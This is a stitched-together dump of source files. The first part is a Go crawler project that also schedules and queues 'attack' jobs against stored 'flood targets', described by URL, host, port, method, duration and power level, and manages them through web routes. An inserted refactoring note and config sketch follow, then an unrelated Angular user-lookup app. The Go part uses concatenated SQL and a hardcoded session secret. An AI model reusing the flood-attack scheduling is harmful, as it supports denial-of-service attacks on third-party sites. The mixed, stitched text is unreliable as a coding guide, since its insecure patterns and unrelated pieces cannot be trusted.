http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
ruleRelations = append(ruleRelations, ruleRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*RuleRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, ruleRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "ruleview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}<file_sep>package crontab
import (
"encoding/json"
"fmt"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
cron "github.com/jakecoffman/cron"
)
type Attack struct {
common.Ospider
Cfg
rmq.Queue
}
func NewAttack() *Attack {
return &Attack{}
}
func (self *Attack) Handler() {
c := cron.New()
subCron := cron.New()
subCron.Start()
self.Log.Println(self.FlushCron)
c.AddFunc(self.FlushCron, func() {
sqlStr := `select a.id, a.uid, a.url, a.host, a.port, a.method, a.time,
a.powerlevel, a.status, a.cronid, b.name, b.cron
from spider_flood_target a left join spider_crontab b on a.cronid = b.id`
stmtOut, err := self.Db.Prepare(sqlStr)
if err != nil {
self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
defer stmtOut.Close()
var (
attack handler.FloodTarget
)
rows, err := stmtOut.Query()
if err != nil {
self.Log.Printf("stmtOut.Query fails %s", err)
return
}
defer rows.Close()
for rows.Next() {
if err := rows.Scan(&attack.Id, &attack.Uid, &attack.Url, &attack.Host,
&attack.Port, &attack.Method, &attack.Time,
&attack.Powerlevel, &attack.Status, &attack.Crontab.Id,
&attack.Crontab.Name, &attack.Crontab.Cron); err != nil {
self.Log.Printf("rows.Scan fails %s", err)
return
}
// copy the shared loop variable so each closure below keeps its own row
attack := attack
attackJson, _ := json.Marshal(attack)
subCron.RemoveJob(fmt.Sprintf("%d", attack.Id))
if (attack.Status & 1) == 0 {
continue
}
subCron.AddFunc(attack.Crontab.Cron, func() {
self.Log.Println(attack.Crontab.Cron)
self.Log.Printf("%s", attackJson)
// push the task onto the redis queue
if !self.Publish(string(attackJson)) {
self.Log.Printf("put in task queue fails")
}
}, fmt.Sprintf("%d", attack.Id))
}
}
}, "initTask")
c.Start()
}
<file_sep>package handler
import (
"database/sql"
_"github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"time"
"github.com/huzorro/ospider/common"
)
type Crontab struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Name string `json:"name"`
Cron string `json:"cron"`
Status int64 `json:"status"`
Logtime string `json:"logtime"`
}
type CrontabRelation struct {
Crontab
user.SpStatUser
}
func GetCrontabsApi(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
crontabs []Crontab
js []byte
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
sqlStr := `select id, uid, name, cron, status, logtime from spider_crontab where status = 1`
stmtOut, err := db.Prepare(sqlStr)
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
defer stmtOut.Close()
rows, err := stmtOut.Query()
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
defer rows.Close()
for rows.Next() {
if err := rows.Scan(&crontab.Id, &crontab.Uid, &crontab.Name,
&crontab.Cron, &crontab.Status, &crontab.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
crontabs = append(crontabs, crontab)
}
if js, err = json.Marshal(crontabs); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func GetCrontab(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
log.Printf("group privilege error")
}
sqlStr := `select id, uid, name, cron, status, logtime
from spider_crontab where ` + con + " id = ?"
stmtOut, err := db.Prepare(sqlStr)
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
defer stmtOut.Close()
id, _ := strconv.Atoi(r.PostFormValue("Id"))
rows, err := stmtOut.Query(id)
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
defer rows.Close()
if rows.Next() {
if err := rows.Scan(&crontab.Id, &crontab.Uid, &crontab.Name,
&crontab.Cron, &crontab.Status, &crontab.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(crontab); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditCrontab(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&crontab).Elem()
rValue := reflect.ValueOf(&crontab).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknown type %s", p)
}
}
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_crontab set name = ?, cron = ?, status = ?
where id = ? and uid = ?`
stmtIn, err := db.Prepare(sqlStr)
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
defer stmtIn.Close()
if _, err = stmtIn.Exec(crontab.Name, crontab.Cron, crontab.Status, crontab.Id, spUser.Id); err != nil {
log.Printf("update crontab fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddCrontab(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&crontab).Elem()
rValue := reflect.ValueOf(&crontab).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknown type %s", p)
}
}
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_crontab (uid, name, cron, logtime)
values(?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
defer stmtIn.Close()
if _, err := stmtIn.Exec(spUser.Id, crontab.Name, crontab.Cron, time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
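The same reflection loop appears verbatim in AddRule, EditCrontab, and AddCrontab above; it could be factored into a shared helper. A minimal standalone sketch of that refactor (the names `bindForm` and `demoCrontab` are hypothetical, and form values arrive here as a plain map instead of `r.PostFormValue`):

```go
package main

import (
	"fmt"
	"reflect"
	"strconv"
)

// bindForm copies form-style string values into the exported fields of
// the struct that dst points to, matching field names exactly, the same
// way the handlers' inline reflection loops do.
func bindForm(dst interface{}, form map[string]string) {
	rType := reflect.TypeOf(dst).Elem()
	rValue := reflect.ValueOf(dst).Elem()
	for i := 0; i < rType.NumField(); i++ {
		fN := rType.Field(i).Name
		p, ok := form[fN]
		if !ok || p == "" {
			continue
		}
		switch rType.Field(i).Type.Kind() {
		case reflect.String:
			rValue.FieldByName(fN).SetString(p)
		case reflect.Int64:
			in, _ := strconv.ParseInt(p, 10, 64)
			rValue.FieldByName(fN).SetInt(in)
		case reflect.Float64:
			fl, _ := strconv.ParseFloat(p, 64)
			rValue.FieldByName(fN).SetFloat(fl)
		}
	}
}

// demoCrontab mirrors the shape of the Crontab handler struct.
type demoCrontab struct {
	Id     int64
	Name   string
	Cron   string
	Status int64
}

func main() {
	var c demoCrontab
	bindForm(&c, map[string]string{"Name": "nightly", "Cron": "0 0 * * *", "Status": "1"})
	fmt.Printf("%+v\n", c) // {Id:0 Name:nightly Cron:0 0 * * * Status:1}
}
```

Each handler could then call the helper once instead of repeating the switch, keeping the per-field parsing behavior identical.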
func GetCrontabs(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
crontabRelation *CrontabRelation
crontabRelations []*CrontabRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ")"
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ")"
default:
log.Printf("group privilege error")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_crontab a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.name, a.cron, a.status, a.logtime
from spider_crontab a left join sp_user b on a.uid = b.id
` + con + ` order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
stmtOut, err = db.Prepare(sqlStr)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
defer stmtOut.Close()
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
defer rows.Close()
for rows.Next() {
crontabRelation = &CrontabRelation{}
if err := rows.Scan(&crontabRelation.Crontab.Id,&crontabRelation.Crontab.Uid,
&crontabRelation.UserName, &crontabRelation.Name, &crontabRelation.Cron,
&crontabRelation.Crontab.Status, &crontabRelation.Crontab.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
crontabRelations = append(crontabRelations, crontabRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*CrontabRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, crontabRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "crontabview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}<file_sep># ospider
[](https://semaphoreci.com/huzorro/ospider)
<file_sep>package common
import (
"database/sql"
"github.com/huzorro/spfactor/sexredis"
"log"
)
type Ospider struct {
Log *log.Logger
P *sexredis.RedisPool
Db *sql.DB
}
type Cfg struct {
//database type
Dbtype string `json:"dbtype"`
//database connection uri
Dburi string `json:"dburi"`
//page size
PageSize int64 `json:"pageSize"`
//task queue name
TaskQueueName string `json:"taskQueueName"`
//result queue name
ResultQueueName string `json:"resultQueueName"`
//attack
AttackQueueName string `json:"attackQueueName"`
//queue unacked limit
UnackedLimit int `json:"unackedLimit"`
//queue consumer num
NumConsumers int `json:"numConsumers"`
//cache
CacheExpire uint64 `json:"cacheExpire"`
}
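The json tags on Cfg above imply a config file shaped roughly like the following. This is an illustrative sketch only: the values are placeholders, and the real config.json loaded in main (via tools.Json2Struct into processor.Cfg, which embeds this struct) may carry additional keys not shown here.

```json
{
    "dbtype": "mysql",
    "dburi": "user:password@tcp(localhost:3306)/ospider?charset=utf8",
    "pageSize": 20,
    "taskQueueName": "spider_task_queue",
    "resultQueueName": "spider_result_queue",
    "attackQueueName": "spider_attack_queue",
    "unackedLimit": 10,
    "numConsumers": 4,
    "cacheExpire": 3600
}
```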
type Result struct {
Title string `json:"title"`
Content string `json:"content"`
}
type Processor interface {
Process(payload string)
}
<file_sep>package main
import (
"database/sql"
"flag"
"html/template"
"log"
"os"
"github.com/go-martini/martini"
_ "github.com/go-sql-driver/mysql"
"github.com/gosexy/redis"
"github.com/huzorro/ospider/util"
"github.com/huzorro/ospider/web/user"
"github.com/huzorro/spfactor/sexredis"
"github.com/huzorro/woplus/tools"
"github.com/martini-contrib/render"
"github.com/martini-contrib/sessions"
// "github.com/adjust/redismq"
"net/http"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/cms"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/crontab"
"github.com/huzorro/ospider/attack"
"github.com/huzorro/ospider/spider/processor"
"github.com/huzorro/ospider/web/handler"
)
func main() {
portPtr := flag.String("port", ":10086", "service port")
redisIdlePtr := flag.Int("redis", 20, "redis idle connections")
dbMaxPtr := flag.Int("db", 10, "max db open connections")
//config path
cfgPathPtr := flag.String("config", "config.json", "config path name")
//web
webPtr := flag.Bool("web", false, "web sm start")
//crontab
cronTaskPtr := flag.Bool("cron", false, "crontab task")
//attack crontab
ca := flag.Bool("ca", false, "attack crontab")
//reset crontab
reset := flag.Bool("reset", false, "reset crontab")
//attack
attackPtr := flag.Bool("attack", false, "attack task")
//spider
spiderPtr := flag.Bool("spider", false, "spider start")
//restful
restfulPtr := flag.Bool("restful", false, "restful start")
//template path
templatePath := flag.String("template", "templates", "template path")
//Static path
staticPath := flag.String("static", "public", "Static path")
flag.Parse()
//json config
var (
// cfg user.Cfg
// cfg crontab.Cfg
cfg processor.Cfg
mtn *martini.ClassicMartini
redisPool *sexredis.RedisPool
db *sql.DB
err error
)
if err := tools.Json2Struct(*cfgPathPtr, &cfg); err != nil {
log.Printf("load json config fails %s", err)
panic(err.Error())
}
logger := log.New(os.Stdout, "\r\n", log.Ldate|log.Ltime|log.Lshortfile)
redisPool = &sexredis.RedisPool{Connections: make(chan *redis.Client, *redisIdlePtr), ConnFn: func() (*redis.Client, error) {
client := redis.New()
err := client.Connect("localhost", uint(6379))
return client, err
}}
db, err = sql.Open(cfg.Dbtype, cfg.Dburi)
db.SetMaxOpenConns(*dbMaxPtr)
if err != nil {
panic(err.Error()) // Just for example purpose. You should use proper error handling instead of panic
}
mtn = martini.Classic()
mtn.Use(martini.Static(*staticPath))
mtn.Map(logger)
mtn.Map(redisPool)
mtn.Map(db)
cache := &user.Cache{DB: db, Pool: redisPool}
mtn.Map(cache)
// load rbac node
if nMap, err := cache.RbacNodeToMap(); err != nil {
logger.Printf("rbac node to map fails %s", err)
} else {
mtn.Map(nMap)
}
//load rbac menu
if ms, err := cache.RbacMenuToSlice(); err != nil {
logger.Printf("rbac menu to slice fails %s", err)
} else {
mtn.Map(ms)
}
//session
store := sessions.NewCookieStore([]byte("secret123"))
mtn.Use(sessions.Sessions("Qsession", store))
//render
rOptions := render.Options{}
rOptions.Extensions = []string{".tmpl", ".html"}
rOptions.Directory = *templatePath
rOptions.Funcs = []template.FuncMap{util.FuncMaps}
mtn.Use(render.Renderer(rOptions))
mtn.Map(&cfg.Cfg.Cfg)
if *cronTaskPtr {
cronTask := crontab.New()
cronTask.Cfg = cfg.Cfg
// taskQueue := redismq.CreateQueue("localhost", "6379", "", 0, cfg.TaskQueueName)
connection := rmq.OpenConnection("cron_producer", "tcp", "localhost:6379", 0)
cronTask.Ospider = common.Ospider{Log: logger, P: redisPool, Db: db}
cronTask.Queue = connection.OpenQueue(cfg.TaskQueueName)
cronTask.Handler()
// cronTask := &crontab.Task{common.Ospider{Log:logger, P:redisPool, Db:db}, cfg}
}
if *ca {
attackCron := crontab.NewAttack()
attackCron.Cfg = cfg.Cfg
pconnection := rmq.OpenConnection("attack_producer", "tcp", "localhost:6379", 0)
attackCron.Ospider = common.Ospider{Log: logger, P: redisPool, Db: db}
attackCron.Queue = pconnection.OpenQueue(cfg.AttackQueueName)
attackCron.Handler()
}
if *reset {
restCron := crontab.NewRest()
restCron.Cfg = cfg.Cfg
restCron.Ospider = common.Ospider{Log: logger, P: redisPool, Db: db}
restCron.Handler()
}
if *attackPtr {
cconnection := rmq.OpenConnection("attack_consumer", "tcp", "localhost:6379", 0)
co := common.Ospider{Log: logger, P: redisPool, Db: db}
processors := make([]common.Processor, 0)
result := &attack.Task{cfg, co, cconnection, processors}
result.AddProcessor(attack.NewAttackSubmit(co)).AddProcessor(attack.NewUpdateHost(co))
result.Handler()
}
if *spiderPtr {
//spider
// server := redismq.NewServer("localhost", "6379", "", 0, "9999")
// server.Start()
// taskQueue := redismq.CreateQueue("localhost", "6379", "", 0, cfg.TaskQueueName)
connection := rmq.OpenConnection("task_consumer&link_producer", "tcp", "localhost:6379", 0)
task := &processor.Task{cfg, common.Ospider{Log: logger, P: redisPool, Db: db}, connection}
task.Handler()
// resultQueue := redismq.CreateQueue("localhost", "6379", "", 0, cfg.ResultQueueName)
connectionLinkResult := rmq.OpenConnection("link_consumer&result_producer", "tcp", "localhost:6379", 0)
result := &processor.TaskContent{cfg, common.Ospider{Log: logger, P: redisPool, Db: db}, connectionLinkResult}
result.Handler()
}
if *restfulPtr {
connection := rmq.OpenConnection("result_consumer", "tcp", "localhost:6379", 0)
co := common.Ospider{Log: logger, P: redisPool, Db: db}
processors := make([]common.Processor, 0)
result := &cms.Task{cfg, co, connection, processors}
result.AddProcessor(cms.NewCommitMysql(co)).AddProcessor(cms.NewCommitRestful(co))
result.Handler()
}
if *webPtr {
//rbac filter
rbac := &user.RBAC{}
mtn.Use(rbac.Filter())
mtn.Get("/login", func(r render.Render) {
r.HTML(200, "login", "")
})
mtn.Get("/logout", user.Logout)
mtn.Post("/login/check", user.LoginCheck)
//user
mtn.Post("/user/view", user.ViewUserAction)
mtn.Get("/usersview", user.ViewUsersAction)
mtn.Post("/user/add", user.AddUserAction)
mtn.Post("/user/edit", user.EditUserAction)
//spider manager
mtn.Get("/", handler.GetSites)
mtn.Post("/spider/one", handler.GetSpider)
mtn.Post("/spider/edit", handler.EditSpider)
mtn.Post("/spider/add", handler.AddSpider)
mtn.Get("/spiderview", handler.GetSpiders)
//spider restful
mtn.Post("/api/spiders", handler.GetSpidersApi)
//spider crontab
mtn.Get("/crontabview", handler.GetCrontabs)
mtn.Post("/crontab/one", handler.GetCrontab)
mtn.Post("/crontab/edit", handler.EditCrontab)
mtn.Post("/crontab/add", handler.AddCrontab)
//crontab restful
mtn.Post("/api/crontabs", handler.GetCrontabsApi)
//spider rule
mtn.Get("/ruleview", handler.GetRules)
mtn.Post("/rule/one", handler.GetRule)
mtn.Post("/rule/edit", handler.EditRule)
mtn.Post("/rule/add", handler.AddRule)
//rule restful
mtn.Post("/api/rules", handler.GetRulesApi)
//spider site
mtn.Get("/siteview", handler.GetSites)
mtn.Post("/site/one", handler.GetSite)
mtn.Post("/site/edit", handler.EditSite)
mtn.Post("/site/add", handler.AddSite)
//flood api
mtn.Get("/floodapiview", handler.GetFloods)
mtn.Post("/floodapi/one", handler.GetFloodApi)
mtn.Post("/floodapi/edit", handler.EditFloodApi)
mtn.Post("/floodapi/add", handler.AddFloodApi)
//flood target
mtn.Get("/floodtargetview", handler.GetfloodTargets)
mtn.Post("/floodtarget/one", handler.GetFloodTarget)
mtn.Post("/floodtarget/edit", handler.EditfloodTarget)
mtn.Post("/floodtarget/add", handler.AddfloodTarget)
go http.ListenAndServe(*portPtr, mtn)
}
select {}
}
|
868e9759552e18317b542044f067a87bb6ce7b3c
|
[
"JavaScript",
"SQL",
"Go",
"Markdown"
] | 25 |
Go
|
huzorro/ospider
|
1ece9a83fa6c33b66adf5af4d8d4e8d453eae06b
|
2c85993d2baf8be9a12b4ad3c1eddd8b517b9bc0
|
refs/heads/master
|
<file_sep>export class LicensesModel{
constructor(
public weapon:string
){
}
}<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { Observable } from 'rxjs';
import { Global } from './global';
import { AuthModel } from '../models/authModel';
@Injectable()
export class UsuarioService {
private URLUsers: string;
constructor(private _http: HttpClient) {
this.URLUsers = Global.URLUsers;
}
getLogin(user: AuthModel): Observable<any> {
let header = new HttpHeaders()
.set('password', <PASSWORD>)
.set('user', user.user);
return this._http.post(Global.URLAuthentication, '', { headers: header });
}
getUsuarios(): Observable<any> {
let headers = new HttpHeaders().set(
'access-token',
localStorage.getItem('token')
);
return this._http.get(this.URLUsers, { headers: headers });
}
}
<file_sep>import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { AppRoutingModule } from './app-routing.module';
import { AppComponent } from './app.component';
import { LoginComponent } from './components/login/login.component';
import { CardsComponent } from './components/cards/cards.component';
import { BuscadorComponent } from './components/buscador/buscador.component';
import { UserComponent } from './components/user/user.component';
import {UsuarioService} from './service/usuarios';
import { HttpClientModule } from '@angular/common/http';
import { FormsModule } from '@angular/forms';
import {NgxPaginationModule} from 'ngx-pagination';
import { GeneroPipe } from './pipes/genero.pipe';
import { MayusculasPipe } from './pipes/mayusculas.pipe';
import { AuthGuard } from './service/authguard';
import {JobsService} from './service/jobs';
import { MayusculaPipe } from './pipes/mayuscula.pipe';
@NgModule({
declarations: [
AppComponent,
LoginComponent,
CardsComponent,
BuscadorComponent,
UserComponent,
GeneroPipe,
MayusculasPipe,
MayusculaPipe,
],
imports: [
BrowserModule,
AppRoutingModule,
HttpClientModule,
FormsModule,
NgxPaginationModule
],
providers: [UsuarioService, AuthGuard, JobsService],
bootstrap: [AppComponent]
})
export class AppModule { }
<file_sep>export class VehiclesModel{
constructor(
public model: string,
public plate: string
) {
}
}<file_sep>export class JobGradesModel {
constructor(
public grade: string,
public salary: number,
public skin_male: [],
public label: string,
public name: string,
public job_name: string,
) {
}
}<file_sep>import { Injectable } from "@angular/core";
import {Observable} from 'rxjs';
import {HttpClient, HttpHeaders} from '@angular/common/http';
import { Global } from './global';
@Injectable()
export class JobsService {
constructor(private _http: HttpClient) {
}
public getJobs():Observable<any>{
let headers = new HttpHeaders().set(
'access-token',
localStorage.getItem('token')
);
return this._http.get(Global.URLJobs, {headers: headers});
}
}<file_sep>import { Component, EventEmitter, Input, OnInit, Output } from '@angular/core';
import { JobGradesModel } from 'src/app/models/jobGradesModel';
import { JobsModel } from 'src/app/models/jobsModel';
import { UserModel } from 'src/app/models/userModel';
@Component({
selector: 'app-cards',
templateUrl: './cards.component.html',
styleUrls: ['./cards.component.css'],
})
export class CardsComponent implements OnInit {
@Input() usuario: UserModel;
@Input() trabajo: JobsModel;
constructor() {
console.log(this.usuario)
}
ngOnInit(): void {
console.log(this.usuario)
}
}
<file_sep>import { Component, EventEmitter, Input, OnInit, Output } from '@angular/core';
import { JobGradesModel } from 'src/app/models/jobGradesModel';
import { JobsModel } from 'src/app/models/jobsModel';
import { UserModel } from 'src/app/models/userModel';
@Component({
selector: 'app-user',
templateUrl: './user.component.html',
styleUrls: ['./user.component.css'],
})
export class UserComponent implements OnInit {
@Input() usuario: UserModel;
@Output() close = new EventEmitter();
@Input() trabajo: JobGradesModel;
constructor() {}
ngOnInit(): void {
}
closeModal() {
this.close.emit();
}
}
<file_sep>import { JobGradesModel } from './jobGradesModel';
export class JobsModel {
constructor(
public label : string,
public name: string,
public job_grades: JobGradesModel
) {
}
}<file_sep>import { Component, ElementRef, OnInit, ViewChild } from '@angular/core';
import { UsuarioService } from 'src/app/service/usuarios';
import * as $ from 'jquery/dist/jquery.js';
import { UserModel } from 'src/app/models/userModel';
import { JobsService } from 'src/app/service/jobs';
import { JobsModel } from 'src/app/models/jobsModel';
import { JobGradesModel } from 'src/app/models/jobGradesModel';
import { Router } from '@angular/router';
import '@popperjs/core/dist/umd/popper.min.js';
@Component({
selector: 'app-buscador',
templateUrl: './buscador.component.html',
styleUrls: ['./buscador.component.css'],
})
export class BuscadorComponent implements OnInit {
@ViewChild('search') search: ElementRef;
public users: Array<UserModel>;
paginaActual: number = 1;
public mostrarModal: boolean;
public usuario: UserModel;
public trabajos: Array<JobsModel>;
public trabajo: JobsModel;
public jobGradels: Array<JobGradesModel>;
public jobGradel: JobGradesModel;
public aux: number;
constructor(
private _servicio: UsuarioService,
private _serviceJob: JobsService,
private _router: Router
) {
this.users = [];
this.mostrarModal = false;
this.aux = 1;
}
ngOnInit(): void {
}
cerrarSesion(opcion?: number) {
if (opcion == 1) {
localStorage.removeItem('token');
this._router.navigate(['/']);
} else if (opcion == 0) {
document.getElementById('modalLogOut').style.visibility = 'hidden';
} else {
document.getElementById('modalLogOut').style.visibility = 'visible';
}
}
jobs() {
this._serviceJob.getJobs().subscribe((res) => {
this.trabajos = Object.values(res);
this.trabajos.filter((j) => {
if (j.name == this.usuario.job) {
this.trabajo = j;
this.trabajos = Object.values(j);
this.jobGradels = Object.values(this.trabajos[2]);
for (let i = 0; i < this.jobGradels.length; i++) {
if (this.jobGradels[i].grade == this.usuario.job_grade) {
this.trabajo.job_grades = this.jobGradels[i];
}
}
}
});
});
}
verUsuario(select) {
this.mostrarModal = true;
this.usuario = this.users[select];
this.usuario.licenses = Object.values(this.usuario.licenses);
this.usuario.vehicles = Object.values(this.usuario.vehicles);
this.jobs();
}
mostrarUsuario() {
this.users = [];
this.aux = 1;
this._servicio.getUsuarios().subscribe(
(res) => {
for (let i = 0; i < res.length; i++) {
var nombre = res[i].identity.name.toLowerCase();
var first = res[i].identity.firstname.toLowerCase();
var second = res[i].identity.secondname.toLowerCase();
var searchData = this.search.nativeElement.value
.replaceAll(' ', '')
.toLowerCase();
if (
nombre == searchData ||
nombre + first == searchData ||
nombre + first + second == searchData ||
first == searchData ||
second == searchData ||
first + second == searchData
) {
this.users.push(res[i]);
this.paginacion('flex');
}
}
if (this.users.length <= 0) {
this.aux = 0;
}
},
(error) => {}
);
}
paginacion(opcion): void {
$(document).ready(function () {
$('.ngx-pagination').css('display', opcion);
});
}
close(event) {
this.users = [];
this.usuario = null;
this.search.nativeElement.value = '';
this.paginacion('none');
}
}
<file_sep>import { Component, ElementRef, OnInit, ViewChild } from '@angular/core';
import { AuthModel } from 'src/app/models/authModel';
import { UsuarioService } from 'src/app/service/usuarios';
import { Router } from '@angular/router';
@Component({
selector: 'app-login',
templateUrl: './login.component.html',
styleUrls: ['./login.component.css'],
})
export class LoginComponent implements OnInit {
@ViewChild('usuario') usuario: ElementRef;
@ViewChild('contrasena') contrasena: ElementRef;
public user: AuthModel;
constructor(private _service: UsuarioService, private _router: Router) {}
ngOnInit(): void {}
login() {
this.user = new AuthModel(
this.usuario.nativeElement.value,
this.contrasena.nativeElement.value
);
this._service.getLogin(this.user).subscribe(
(res) => {
if (res.auth) {
localStorage.setItem('token', res.token);
this._router.navigate(['buscador']);
}
},
(error) => {
console.log(error);
}
);
}
}
<file_sep>import { IdentityModel } from './identityModel';
import { LicensesModel } from './licensesModel';
import { VehiclesModel } from './vehiclesModel';
export class UserModel{
constructor(
public identifier:string,
public identity: IdentityModel,
public job: string,
public job_grade: string,
public licenses: Array< LicensesModel>,
public bank_money: string,
public phone_calls: [],
public phone_number: string,
public validated: boolean,
public house_id: string,
public vehicles:Array< VehiclesModel>
){}
